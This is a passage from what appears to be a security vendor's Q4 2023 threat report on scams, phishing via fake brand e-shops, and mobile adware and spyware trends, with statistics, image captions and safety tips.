<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7983" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Activity of financial scams in Q4</figcaption></figure></div>
<p>We have drawn attention to these ads many times. Typically, they lead to fraudulent sites that aim to promote information from ads and then redirect users to a registration form such as the one shown below.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-1024x574.png" alt="" class="wp-image-8022" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-1024x574.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-300x168.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-768x430.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-540x304.png 540w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-344x194.png 344w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36.png 1358w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Example of scam registration site</figcaption></figure></div>
<h3 class="wp-block-heading">Dating Scams</h3>
<p><em>Dating scams, also known as romance scams or online dating scams, involve fraudsters deceiving individuals into fake romantic relationships. Scammers adopt fake online identities to gain the victim’s trust, with the ultimate goal of obtaining money or enough personal information to commit identity theft.</em></p>
<p>In comparison to the previous quarter, a significant global increase in online dating fraud was seen in Q4 2023. However, intriguing shifts in attack patterns and targeted regions have come to light. Notably, despite a temporary decline in the number of scams during the holiday season, perhaps due to individuals being preoccupied with festive celebrations and spending time with loved ones, there are now emerging trends in how and where these scams are being deployed. Attackers have shifted their focus to different countries, marking a distinctive change in their strategies.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7984" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Heatmap showing risk-ratio for Q4/2023</figcaption></figure></div>
<p>The most substantial increase has been observed in the Arab states, including Saudi Arabia, Yemen, Oman, the United Arab Emirates, Kuwait, as well as in Indonesia, Cambodia, and Thailand. This shift in focus might be linked to a broader global trend of increased online interactions and digital connections. The evolving landscape of online socialization and communication has inadvertently created both challenges and opportunities for scammers. As people continue to engage more extensively in online platforms for various reasons, attackers are adapting their strategies and targeting different regions to exploit these shifting patterns of online activity.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7985" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Activity of DatingScam in Saudi Arabia</figcaption></figure></div>
<p>Countries in Central Europe and North America continue to face dating scams most, with approximately one in 20 users encountering these threats, on average. The observed decline during the holidays has piqued our interest, and we anticipate a resurgence in scam activities, particularly in the lead-up to Valentine’s Day. The romantic nature of this occasion may make individuals more susceptible to online connections, providing an opportune moment for attackers to exploit emotions and vulnerabilities.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1024x768.png" alt="" class="wp-image-7986" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1024x768.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-300x225.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-768x576.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1536x1152.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">DatingScam example from Saudi Arabia</figcaption></figure></div>
<h3 class="wp-block-heading">Tech Support Scams</h3>
<p><em>Tech support scam threats involve fraudsters posing as legitimate technical support representatives who attempt to gain remote access to victims’ devices or obtain sensitive personal information, such as credit card or banking details. These scams rely on confidence tricks to gain victims’ trust and often involve convincing them to pay for unnecessary services or purchase expensive gift cards. It’s important for internet users to be vigilant and to verify the credentials of anyone claiming to offer technical support services.</em></p>
<p>The fourth quarter showed tech support scam activity continued its downtrend that we observed all 2023. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7987" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Graph illustrating a decline for 2 quarters</figcaption></figure></div>
<p>Several countries in which we typically observe significant tech support scam activity register significant declines in risk ratio. There are exceptions, one of which is Spain, which came third in our quarterly ranking. In Spain we see a 42% increase in the risk ratio in Q4 2023.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7988" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Heatmap showing risk-ratio for Q4/2023</figcaption></figure></div>
<p>Our ranking is traditionally dominated by Japan, together with the USA, followed by Spain. Interestingly, last quarter leader, Germany, has fallen back and rounds out our top 6, just behind France.</p>
<ul>
<li>Japan 1.08%</li>
<li>United States 1.02%</li>
<li>Spain 0.81%</li>
<li>Australia 0.72%</li>
<li>France 0.68%</li>
<li>Germany 0.64%</li>
</ul>
<p>If we look at the activity graph of Spain. We can see that the main source of activity comes at the end of November.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7989" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-TSS_Q423_ES_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Tech Support Scam activity in Q4/2023 for Spain</figcaption></figure></div>
<p>The Tech Support scam landing pages changes very little. The same techniques are still used to block the user’s browser and force the user to dial the phone number offered. Therefore, the example of the most prevalent landing page shows only minor changes.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="527" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1024x527.png" alt="" class="wp-image-7990" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1024x527.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-768x395.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant-1536x790.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/TSS_spanish_variant.png 1677w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The Spanish variant of the most prevalent version of the TSS landing page</em></figcaption></figure></div>
<h3 class="wp-block-heading">Refund and Invoice Scams</h3>
<p><em>Invoice scams involve fraudsters sending false bills or invoices for goods or services that were never ordered or received. Scammers rely on invoices looking legitimate, often using company logos or other branding to trick unsuspecting victims into making payments. These scams can be especially effective when targeted at businesses, as employees may assume that a colleague made the purchase or simply overlook the details of the invoice. It’s important to carefully review all invoices and bills before making any payments and to verify the legitimacy of the sender if there are any suspicions of fraud.</em></p>
<h6 class="wp-block-heading"><strong>Online Billing: New Frontier for Cybercriminals in 2024</strong></h6>
<p>It’s common for internet users to have approximately 80-90 passwords for various services, as reported by <a href="https://www.newswire.com/news/new-research-most-people-have-70-80-passwords-21103705" target="_blank" rel="noreferrer noopener">LastPass</a>, and cybercriminals take advantage of a simple fact: users must keep track of an unimaginable number of subscription accounts. Additionally, many traditional companies that previously relied on manual service management processes are gradually transitioning their customers to paperless methods, such as online account billing. This shift, primarily a cost-saving measure, is likely to continue in the future, with most customer services moving to online accounts or mobile apps. Attackers are aware of this trend, which has opened new avenues for cybercrime.</p>
<p>One fruitful strategy employed by cybercriminals is to target digital services that have widespread usage. In Q4 2023, we observed a significant increase in one particular type of scam: subscription fraud. Among these, Netflix scams emerged prominently. With Netflix’s user base soaring to <a href="https://www.statista.com/statistics/250934/quarterly-number-of-netflix-streaming-subscribers-worldwide/" target="_blank" rel="noreferrer noopener">over 250 million in</a> 2023, the likelihood of successfully attacking a random subscriber is quite high, especially in the US and Europe where the penetration of these services is generally higher.</p>
<p>The typical Netflix online billing scam attack generally arrives in the form of an email, which is a little more difficult to examine on a small screen. These messages are increasingly tailored to fit the small screens of mobile devices, a trend that aligns with the growing trend of using cell phones to manage one’s entire online presence. Let’s look at what these scams look like:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="586" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-586x1024.png" alt="" class="wp-image-7991" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-586x1024.png 586w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled-172x300.png 172w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Untitled.png 622w" sizes="(max-width: 586px) 100vw, 586px" /><figcaption class="wp-element-caption">Netflix-based invoice scam spreading in Q4/2023</figcaption></figure></div>
<p>There are several red flags in the email that should raise alarms. A common thread is the language scammers use, which often create a sense of urgency and sometimes include spelling and grammar mistakes (though less with the increase of AI as a tool to support in scam message creation). The color scheme of such messages is frequently tailored to enhance the sense of urgency, with a strong use of red, yellow, or a combination thereof. For a company like Netflix – which spends enormous amounts on marketing – the design, if examined closely, is not very well-executed. Additionally, companies typically do not ask you to update payment details via a link in the email. These are just the main red flags in this particular example.</p>
<p>Geographically, the countries most affected by these online billing scams are predominantly located in Europe and North America. There are a few exceptions: Australia has the highest risk ratio of 1.52%, and New Zealand is close behind with 1.11%, ranking third. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x639.png" alt="" class="wp-image-7992" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Refund and invoice scam spreading in Q4/2023</figcaption></figure></div>
<p>In Q4/2023, when we examine online billing scam data on a month-by-month basis, we can identify a significant spike during the last week of November. Even the period leading up to Christmas was higher than normal, which might be attributed to the fact that, for many people, Christmas is a time when they report higher-than-usual stress levels, according to the <a href="https://www.apa.org/news/press/releases/2023/11/holiday-season-stress">American Psychological Association</a>. As we know, scammers take advantage of people’s vulnerable moments, and the holiday season can often be wrought with. Additionally, buying habits change during the holiday season, which might also contribute to the spike.</p>
<p>The trend line we see in the graph continues to climb throughout the fourth quarter, as seen below. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x404.png" alt="" class="wp-image-7993" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_Invoice-Scams-Q4-report_2023-12-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Refund and invoice scam spreading in Q4/2023</figcaption></figure></div>
<p>As always, stay vigilant and pay close attention to the emails you receive, especially on your mobile device to help avoid these types of scams.</p>
<h3 class="wp-block-heading">Phishing: Post-Holiday Phishing Alert in Online Shopping</h3>
<p><em>Phishing is a type of online scam where fraudsters attempt to obtain sensitive information including passwords or credit card details by posing as a trustworthy entity in an electronic communication, such as an email, text message, or instant message. The fraudulent message usually contains a link to a fake website that looks like the real one, where the victim is asked to enter their sensitive information.</em></p>
<p>As far as phishing is concerned, attackers did not relent in their efforts in Q4/2023. The phishing graph below highlights the overall increase in web threats.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7994" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_total_2023_Q4_malware_phishing_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing activity throughout 2023</figcaption></figure></div>
<p>Throughout 2023 we witnessed a wide array of phishing campaigns. During the fourth quarter, there was interesting activity in the category of fake online shops (also referred to as e-shops).</p>
<p>Following the holiday season, a surge of <a href="https://blog.avast.com/avast-researchers-detect-surge-in-fake-e-shops" target="_blank" rel="noreferrer noopener">over 4,000 fake e-shops</a> imitating popular brands posed a threat to online shoppers. Scammers exploited post-holiday bargain hunters, making vigilance crucial.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="460" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1024x460.png" alt="" class="wp-image-7995" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1024x460.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-300x135.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-768x345.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2-1536x690.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_2.png 1918w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop</figcaption></figure></div>
<p>The cyber criminals behind these fake e-shop attacks meticulously mimic renowned brands (including  Nike, Adidas, Pandora, Zara, Hilfiger, The North Face and many more) luring consumers with incredibly realistic-looking websites. Their process involves phishing for personal information during a fake login, and the sites often appear amongst the top search results.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-1024x647.png" alt="" class="wp-image-7996" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-1024x647.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-300x190.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search-768x485.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/google_search.png 1298w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Search top results including fake e-shop</figcaption></figure></div>
<p>In the final stages of the scam, users are coerced into providing personal and payment details, risking exposure of sensitive information. </p>
<p>Tips for safety include verifying website credibility, cautious sale shopping, watching for fraud signals, and keeping security software updated.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="845" height="538" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login.png" alt="" class="wp-image-7997" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login.png 845w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login-300x191.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_login-768x489.png 768w" sizes="(max-width: 845px) 100vw, 845px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing login form</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="915" height="608" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register.png" alt="" class="wp-image-7998" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register.png 915w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register-300x199.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_register-768x510.png 768w" sizes="(max-width: 915px) 100vw, 915px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing register form</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="629" height="575" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment.png" alt="" class="wp-image-7999" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment.png 629w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/fake_shop_payment-300x274.png 300w" sizes="(max-width: 629px) 100vw, 629px" /><figcaption class="wp-element-caption">Fake TheNorthFace e-shop – phishing payment form</figcaption></figure></div>
<p class="has-text-align-right"><em>Alexej Savčin, Malware Analyst<br>Branislav Kramár, Malware Analyst<br>Matěj Krčma, Malware Analyst</em></p>
<h2 class="wp-block-heading">Mobile-Related Threats</h2>
<p>As we enter the new year, we can look back on an interesting quarter in the mobile threat landscape. While adware continued its reign as one of the most prevalent threats facing mobile users in Q4 2023, we also observed the Chameleon banker making a comeback and taking aim at victim’s bank accounts with new HTML injection prompts, coupled with disabling biometric unlocks that allow it to extract victim PIN and passwords. A first for the mobile sphere, FakeRust remote desktop access applications were also used to make fraudulent payments on behalf of users, leaving them with little recourse in challenging these payments.</p>
<p>In the realm of mobile apps, a new spyware strain, coined Xamalicious, used the open-source framework Xamarin to stay undetected in the PlayStore and take over user devices to steal data and perform click fraud. We observed an unusual double SpyAgent targeting both Android and iOS users in Korea, aiming to extract sensitive information such as SMS messages and contacts. SpyLoans also continued to spread in the PlayStore and was used to extort victims, even threatening physical violence in some cases, breaching the digital and real-world divide. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="672" height="330" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans.jpg" alt="" class="wp-image-8000" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans.jpg 672w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Mobile-Intro-Threats-SpyLoans-300x147.jpg 300w" sizes="(max-width: 672px) 100vw, 672px" /><figcaption class="wp-element-caption">SpyLoan app reviews on the PlayStore tell a story of extreme interest rates, harassment of contacts stolen from the device and in some cases even threats of violence</figcaption></figure></div>
<p>Finally, another set of malicious WhatsApp spyware mods was distributed to users, interestingly using the Telegram platform.</p>
<h3 class="wp-block-heading">Web-Threats Data in the Mobile Landscape</h3>
<p>As with Q3 2023, we now include web-threat related data in our telemetry for mobile threats. Scams, phishing and malvertising were responsible for most blocked attacks on mobile devices in Q4 2023. We noted a decrease in the percentage share of scams and an increase in phishing and malvertising compared to the previous quarter. These are discussed in more detail in the web-threat sections of this report.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="790" height="348" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic.png" alt="" class="wp-image-8001" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic.png 790w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic-300x132.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/Q4-Avast-Mobile-Threats-Infographic-768x338.png 768w" sizes="(max-width: 790px) 100vw, 790px" /><figcaption class="wp-element-caption">Graphs showing the most prevalent threats in the mobile sphere in Q4/2023</figcaption></figure></div>
<p>Web-based threats will continue to account for most blocked attacks on mobile devices going forward. For malware applications to initiate their intended malicious activity on Android or iOS, they must be installed by the user and activated by running the application. In most cases, additional permissions must be given to the application to allow full reign of the infected device.</p>
<p>Comparatively, web-based threats are much more likely to be encountered during regular browsing as most mobile device users browse the internet daily. These web threats can be contained in private messages, emails, and SMS but also in the form of malicious adverts, redirects, unwanted pop ups and via other avenues. Blocking web-threat based attacks is beneficial for the security of mobile devices, as malware actors often use them as an entry point to get the payload onto the mobile device of their victims.</p>
<h3 class="wp-block-heading">Adware remains at the top</h3>
<p><em>Adware threats on mobile phones refer to applications that display intrusive out-of-context adverts to users with the intent of gathering fraudulent advertising revenue. This malicious functionality is often delayed until sometime after installation and coupled with stealthy features such as hiding the adware app icon to prevent removal. Adware mimics popular apps such as games, camera filters, and wallpaper apps, to name a few.</em></p>
<p>Adware was yet again the most prevalent of the traditional on-device malware threats in the mobile sphere in Q4 2023. Raking in fraudulent advertising revenue while negatively affecting the user experience of victims, these apps use various methods of spread to continue to sneak onto victims’ devices and remain hidden for as long as possible.</p>
<p>HiddenAds was again at the top of the adware list, trailed by SocialBar, a web threat adware that displays aggressive push notifications. Further down the list are MobiDash and FakeAdBlockers that altogether make up the bulk of adware threats facing mobile users this quarter. </p>
<p>On-device adware shares some similarities, with these strains often hiding their icons once installed on user devices to prolong their malicious activity. Some adware has been seen serving advertisements while the screen is off to avoid detection and generate fraudulent revenue. Others are more brazen, displaying full screen out-of-context ads to victims, greatly impacting their user experience as they struggle to identify the source of the annoying adverts. </p>
<p>Methods of spread for adware include third party app stores, fake websites distributing adware games and malicious redirects coupled with false advertising that leads users to download these adware apps.</p>
<div class="wp-block-image">
